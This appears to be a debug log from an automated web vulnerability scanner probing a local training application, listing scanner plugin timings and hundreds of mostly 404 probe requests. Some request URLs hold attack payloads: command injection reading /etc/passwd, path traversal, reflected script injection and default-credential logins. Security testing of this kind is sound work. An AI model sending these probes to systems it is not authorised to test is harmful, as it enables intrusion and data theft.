(id=23174,from_cache=0,grep=1,rtt=0.05,did=OrroBpZx) [Wed Feb 12 10:04:28 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11883, 'reject-seen-url': 5591, 'reject-out-of-scope': 216, 'accept': 4860} [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2162. [Wed Feb 12 10:04:28 2020 - debug] vulners_db.grep(uri="http://localhost:9090/faq/") took 0.10s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/phpinfo.php3?VARIABLE= returned HTTP code "404" (id=23101,from_cache=0,grep=1,rtt=0.11,did=F9muv60g) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/bb000001.pl returned HTTP code "404" (id=23177,from_cache=0,grep=1,rtt=0.12,did=bTeGC7D7) [Wed Feb 12 10:04:28 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] keys.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] clamav.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] objects.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] error_500.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] meta_tags.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] password_profiling.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] click_jacking.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] lang.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/usage/ returned HTTP code "404" (id=23180,from_cache=0,grep=1,rtt=0.10,did=pFAZLCP5) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4462. [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/isx.html returned HTTP code "404" (id=23185,from_cache=0,grep=1,rtt=0.15,did=mC5GzqOp) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/ews/ews/architext_query.pl returned HTTP code "404" (id=23189,from_cache=0,grep=1,rtt=0.14,did=UBJYm5is) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/msadm/domain/index.php3?account_name=\\"> returned HTTP code "404" (id=23190,from_cache=0,grep=1,rtt=0.05,did=QOPhgjMq) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/_vti_bin/_vti_aut/fp30reg.dll returned HTTP code "404" (id=23191,from_cache=0,grep=1,rtt=0.13,did=O8SKxbvv) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cfdocs/snippets/viewexample.cfm returned HTTP code "404" (id=23192,from_cache=0,grep=1,rtt=0.22,did=USxmHAgK) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~nuucp returned HTTP code "404" (id=23193,from_cache=0,grep=1,rtt=0.03,did=gXF1CukC) [Wed Feb 12 10:04:28 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] strange_reason.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/MsmMask.exe?mask=/junk334 returned HTTP code "404" (id=23194,from_cache=0,grep=1,rtt=0.13,did=6Ewlntvx) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/pmlite.php returned HTTP code "404" (id=23196,from_cache=0,grep=1,rtt=0.26,did=g8qxkUpj) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/infosrch.cgi returned HTTP code "404" (id=23197,from_cache=0,grep=1,rtt=0.07,did=gvnAwXO7) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/ab2/\\@AdminAddadmin?uid=foo&password=bar&re_password=bar returned HTTP code "404" (id=23199,from_cache=0,grep=1,rtt=0.03,did=tS6ruW5B) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/unlg1.1 returned HTTP code "404" (id=23186,from_cache=0,grep=1,rtt=0.07,did=M2NjMYhO) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/administrator/gallery/view.php?path=\\" returned HTTP code "404" (id=23181,from_cache=0,grep=1,rtt=0.04,did=fI126nWB) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/submit?setoption=q&option=allowed_ips&value=255.255.255.255 returned HTTP code "404" (id=23179,from_cache=0,grep=1,rtt=0.11,did=Z6U4oqEq) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/admin.php4?reg_login=1 returned HTTP code "404" (id=23183,from_cache=0,grep=1,rtt=0.15,did=lcNpMF4L) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/logicworks.ini returned HTTP code "404" (id=23182,from_cache=0,grep=1,rtt=0.12,did=fDtcILrj) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/~/.aspx returned HTTP code "404" (id=23184,from_cache=0,grep=1,rtt=0.14,did=ouEQs5fY) [Wed Feb 12 10:04:28 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] cache_control.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] strange_headers.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] ssn.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] oracle.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/cgiwrap returned HTTP code "404" (id=23198,from_cache=0,grep=1,rtt=0.03,did=M8m2rVgy) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=invalidfilename returned HTTP code "404" (id=23178,from_cache=0,grep=1,rtt=0.12,did=R0RXA3Ha) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini returned HTTP code "404" (id=23195,from_cache=0,grep=1,rtt=0.13,did=BTuw9cmh) [Wed Feb 12 10:04:28 2020 - debug] feeds.grep(uri="http://localhost:9090/faq/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/downloads/pafiledb.php?action=rate&id=4?\\"<=<=&script=>=>=&alert(\'Vulnerable\')=&/script=&\\"= returned HTTP code "404" (id=23188,from_cache=0,grep=1,rtt=0.19,did=UYxF4piC) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/urlcount.cgi?= returned HTTP code "404" (id=23187,from_cache=0,grep=1,rtt=0.13,did=69fVE24h) [Wed Feb 12 10:04:28 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:28 2020 - debug] url_session.grep(uri="http://localhost:9090/faq/") took 0.17s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/" returned HTTP code "404" (id=23202,from_cache=0,grep=1,rtt=0.31,did=vhVQ8pzv) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/launch.jsp?NFuse_Application= returned HTTP code "404" (id=23203,from_cache=0,grep=1,rtt=0.15,did=euyilPPT) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/Admin_files/order.log returned HTTP code "404" (id=23204,from_cache=0,grep=1,rtt=0.12,did=VOXkO9SC) [Wed Feb 12 10:04:28 2020 - debug] error_pages.grep(uri="http://localhost:9090/faq/") took 0.18s to run [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4463. [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/level/16/exec/-/show/configuration returned HTTP code "404" (id=23206,from_cache=0,grep=1,rtt=0.19,did=zOQUE3jp) [Wed Feb 12 10:04:28 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11902, 'reject-seen-url': 5593, 'reject-out-of-scope': 216, 'accept': 4864} [Wed Feb 12 10:04:28 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/faq/") took 0.16s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/html/partner.php?mainfile=anything&Default_Theme=\'= returned HTTP code "404" (id=23207,from_cache=0,grep=1,rtt=0.06,did=hEls2VNq) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/db/users.dat returned HTTP code "404" (id=23208,from_cache=0,grep=1,rtt=0.15,did=9oUhUYFM) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/openautoclassifieds/friendmail.php?listing=<=<=&script=>=>=&alert(document.domain)=&/script= returned HTTP code "404" (id=23200,from_cache=0,grep=1,rtt=0.13,did=E9rPkyu2) [Wed Feb 12 10:04:28 2020 - debug] localhost:9090 connection pool stats (free:125 / in_use:6 / max:50 / total:131) [Wed Feb 12 10:04:28 2020 - debug] Connections with more in use time: (3212c8070660fc94, 0.13 sec) (e84c572cfcdb1685, 0.12 sec) (db6495378fc8165e, 0.08 sec) (e8eb3d8936b982b5, 0.04 sec) (f59f64952b2172cf, 0.03 sec) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2163. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4464. [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/order/order_log_v12.dat returned HTTP code "404" (id=23205,from_cache=0,grep=1,rtt=0.21,did=ySozy8ZZ) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4465. [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/.shtml returned HTTP code "404" (id=23209,from_cache=0,grep=1,rtt=0.19,did=8UwWr1uU) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2164. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4466. [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/wrap returned HTTP code "404" (id=23212,from_cache=0,grep=1,rtt=0.14,did=WQjiJNPT) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/sqldump.sql returned HTTP code "404" (id=23213,from_cache=0,grep=1,rtt=0.15,did=wJQUX5LO) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/sitemap.xml returned HTTP code "404" (id=23214,from_cache=0,grep=1,rtt=0.13,did=ZyIl1nGD) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/log/nether-log.pl?checkit= returned HTTP code "404" (id=23215,from_cache=0,grep=1,rtt=0.09,did=pOQ9kt1p) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/level/17/exec/show returned HTTP code "404" (id=23217,from_cache=0,grep=1,rtt=0.06,did=wbKkUv42) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/_vti_pvt/deptodoc.btr returned HTTP code "404" (id=23211,from_cache=0,grep=1,rtt=0.06,did=mnijlL5v) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~root returned HTTP code "404" (id=23210,from_cache=0,grep=1,rtt=0.08,did=83lUqG9V) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/manual.php returned HTTP code "404" (id=23216,from_cache=0,grep=1,rtt=0.16,did=gaeQaWKi) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2165. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4466. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4466. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2166. [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4467. [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/learn/vulnerability/a7_xss returned HTTP code "200" (id=23218,from_cache=0,grep=1,rtt=0.10,did=Eks1jNDc) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2167. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/learn/vulnerability/a5_broken_access_control returned HTTP code "200" (id=23221,from_cache=0,grep=1,rtt=0.05,did=p2Vwuosf) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4468. [Wed Feb 12 10:04:29 2020 - debug] symfony.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] svn_users.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2168. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4469. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2169. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23220,from_cache=0,grep=1,rtt=0.04,did=qCCjY3uZ) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/whois.cgi?action=load&whois=;id returned HTTP code "404" (id=23219,from_cache=0,grep=1,rtt=0.15,did=90MsATOW) [Wed Feb 12 10:04:29 2020 - debug] expect_ct.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] file_upload.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:123 / in_use:9 / max:50 / total:132) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (203edfc56ef42a38, 0.12 sec) (6941a0a978ef0bd6, 0.08 sec) (74a9255876c11eb3, 0.06 sec) (b885566e5a990404, 0.06 sec) (5c670c649c5cf5f5, 0.05 sec) [Wed Feb 12 10:04:29 2020 - debug] motw.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] meta_generator.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] retirejs.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:29 2020 - debug] serialized_object.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] blank_body.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] credit_cards.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] websockets_links.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] csp.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] dom_xss.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] keys.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] clamav.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] private_ip.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] objects.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] error_500.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] meta_tags.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] password_profiling.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] click_jacking.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~adm returned HTTP code "404" (id=23222,from_cache=0,grep=1,rtt=0.02,did=TSYWNpaQ) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/~/.asp returned HTTP code "404" (id=23223,from_cache=0,grep=1,rtt=0.08,did=iujJpORI) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/admin/admin_phpinfo.php4 returned HTTP code "404" (id=23224,from_cache=0,grep=1,rtt=0.05,did=JalBa2jP) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/exec/show/config/cr returned HTTP code "404" (id=23226,from_cache=0,grep=1,rtt=0.09,did=aE337lez) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/unlg1.2 returned HTTP code "404" (id=23229,from_cache=0,grep=1,rtt=0.06,did=eErM6UJX) [Wed Feb 12 10:04:29 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/27/exec/show returned HTTP code "404" (id=23225,from_cache=0,grep=1,rtt=0.07,did=UwrQMIEJ) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/login.jsp returned HTTP code "404" (id=23227,from_cache=0,grep=1,rtt=0.10,did=9ApnEorK) [Wed Feb 12 10:04:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11917, 'reject-seen-url': 5597, 'reject-out-of-scope': 216, 'accept': 4870} [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/session/admnlogin returned HTTP code "404" (id=23228,from_cache=0,grep=1,rtt=0.04,did=ArR9u8c7) [Wed Feb 12 10:04:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11917, 'reject-seen-url': 5597, 'reject-out-of-scope': 216, 'accept': 4870} [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4470. [Wed Feb 12 10:04:29 2020 - debug] vulners_db.grep(uri="http://localhost:9090/it/") took 0.13s to run [Wed Feb 12 10:04:29 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11917, 'reject-seen-url': 5597, 'reject-out-of-scope': 216, 'accept': 4870} [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/_vti_pvt/access.cnf returned HTTP code "404" (id=23230,from_cache=0,grep=1,rtt=0.10,did=dVaKiKtX) [Wed Feb 12 10:04:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11917, 'reject-seen-url': 5597, 'reject-out-of-scope': 216, 'accept': 4870} [Wed Feb 12 10:04:29 2020 - debug] lang.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_reason.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] cache_control.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_headers.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] ssn.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] oracle.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] feeds.grep(uri="http://localhost:9090/it/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] url_session.grep(uri="http://localhost:9090/it/") took 0.18s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4471. [Wed Feb 12 10:04:29 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/it/") took 0.06s to run [Wed Feb 12 10:04:29 2020 - debug] error_pages.grep(uri="http://localhost:9090/it/") took 0.10s to run [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/47/exec/show returned HTTP code "404" (id=23231,from_cache=0,grep=1,rtt=0.21,did=mjve3vpC) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/admin.html returned HTTP code "404" (id=23233,from_cache=0,grep=1,rtt=0.05,did=96hqOmyK) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/order/order_log.dat returned HTTP code "404" (id=23235,from_cache=0,grep=1,rtt=0.18,did=d8pFJ6hv) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/redir.exe?URL=http://www.google.com/\r\n\r\n returned HTTP code "404" (id=23236,from_cache=0,grep=1,rtt=0.12,did=nXNwcX9U) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/apps/web/index.fcgi?servers=§ion= returned HTTP code "404" (id=23237,from_cache=0,grep=1,rtt=0.07,did=aM60s4GE) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=&ls /etc|= returned HTTP code "404" (id=23238,from_cache=0,grep=1,rtt=0.21,did=KrvxPv4I) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4472. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/MsmMask.exe?mask=/junk334 returned HTTP code "404" (id=23240,from_cache=0,grep=1,rtt=0.16,did=wc2TQzfM) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/smartsearch.cgi?keywords=|/bin/cat /etc/passwd| returned HTTP code "404" (id=23241,from_cache=0,grep=1,rtt=0.18,did=tDWJ6ZnU) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~operator returned HTTP code "404" (id=23242,from_cache=0,grep=1,rtt=0.13,did=GYbNLWhB) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/18/exec/show returned HTTP code "404" (id=23243,from_cache=0,grep=1,rtt=0.12,did=053fq8UX) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/listrec.pl returned HTTP code "404" (id=23244,from_cache=0,grep=1,rtt=0.20,did=JnLISlNB) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/_vti_pvt/doctodep.btr returned HTTP code "404" (id=23248,from_cache=0,grep=1,rtt=0.14,did=jVUNR8rk) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/fcgi-bin/echo2?foo= returned HTTP code "404" (id=23250,from_cache=0,grep=1,rtt=0.06,did=oCBP9Sgw) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/Mem/dynaform/FileExplorer.htm returned HTTP code "404" (id=23251,from_cache=0,grep=1,rtt=0.14,did=OUcFjfL4) [Wed Feb 12 10:04:29 2020 - debug] POST http://localhost:9090/Mem/dynaform/Login.htm?WINDWEB_URL=/Mem/dynaform/Login.htm&ListIndexUser=0&sWebParam1=admin000 returned HTTP code "404" (id=23252,from_cache=0,grep=1,rtt=0.15,did=fZsctLgo) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/16 returned HTTP code "404" (id=23253,from_cache=0,grep=1,rtt=0.32,did=840UW0IN) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/test-cgi.exe?= returned HTTP code "404" (id=23254,from_cache=0,grep=1,rtt=0.12,did=wdqWM89M) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/37/exec/show returned HTTP code "404" (id=23255,from_cache=0,grep=1,rtt=0.18,did=5aM09irr) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/dbman/db.cgi?db=no-db returned HTTP code "404" (id=23258,from_cache=0,grep=1,rtt=0.05,did=dGeBkHIE) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/launch.asp?NFuse_Application= returned HTTP code "404" (id=23234,from_cache=0,grep=1,rtt=0.06,did=B7MLGTLv) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/57/exec/show returned HTTP code "404" (id=23259,from_cache=0,grep=1,rtt=0.10,did=Du7l2fO7) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/chat/register.php?register=yes&username=OverG&email=&email1= returned HTTP code "404" (id=23260,from_cache=0,grep=1,rtt=0.26,did=vx2uTSns) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/chassis/config/GeneralChassisConfig.html returned HTTP code "404" (id=23256,from_cache=0,grep=1,rtt=0.26,did=Hmsh7bTz) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/structure.sql returned HTTP code "404" (id=23247,from_cache=0,grep=1,rtt=0.11,did=dx47dUPL) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/mods/apage/apage.cgi?f=file.htm.|id| returned HTTP code "404" (id=23257,from_cache=0,grep=1,rtt=0.06,did=d4njEHm5) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/config.php returned HTTP code "404" (id=23239,from_cache=0,grep=1,rtt=0.10,did=iAPO7VKc) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin returned HTTP code "404" (id=23232,from_cache=0,grep=1,rtt=0.16,did=vDwjiPYI) [Wed Feb 12 10:04:29 2020 - debug] GET 